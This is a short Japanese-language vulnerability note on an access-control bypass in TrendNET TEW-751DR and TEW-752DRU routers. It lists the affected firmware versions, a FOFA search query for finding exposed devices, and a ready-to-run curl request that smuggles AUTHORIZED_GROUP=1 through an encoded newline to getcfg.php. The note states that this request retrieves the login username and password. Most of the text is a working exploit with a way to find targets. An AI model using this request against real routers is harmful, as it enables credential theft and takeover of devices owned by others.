TrendNETルーターのアクセス許可バイパスの脆弱性。攻撃者は$ AUTHORIZED_GROUP> = 1に設定することで、アクセス許可の検証をバイパスできます。
影響を受けるバージョン:
- TEW-751DR – v1.03B03
- TEW-752DRU – v1.03B01
脆弱性テスト
fofa検索:「TEW-751DR」
curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1" http://ip/getcfg.php
ログインするためのユーザー名とパスワードを取得します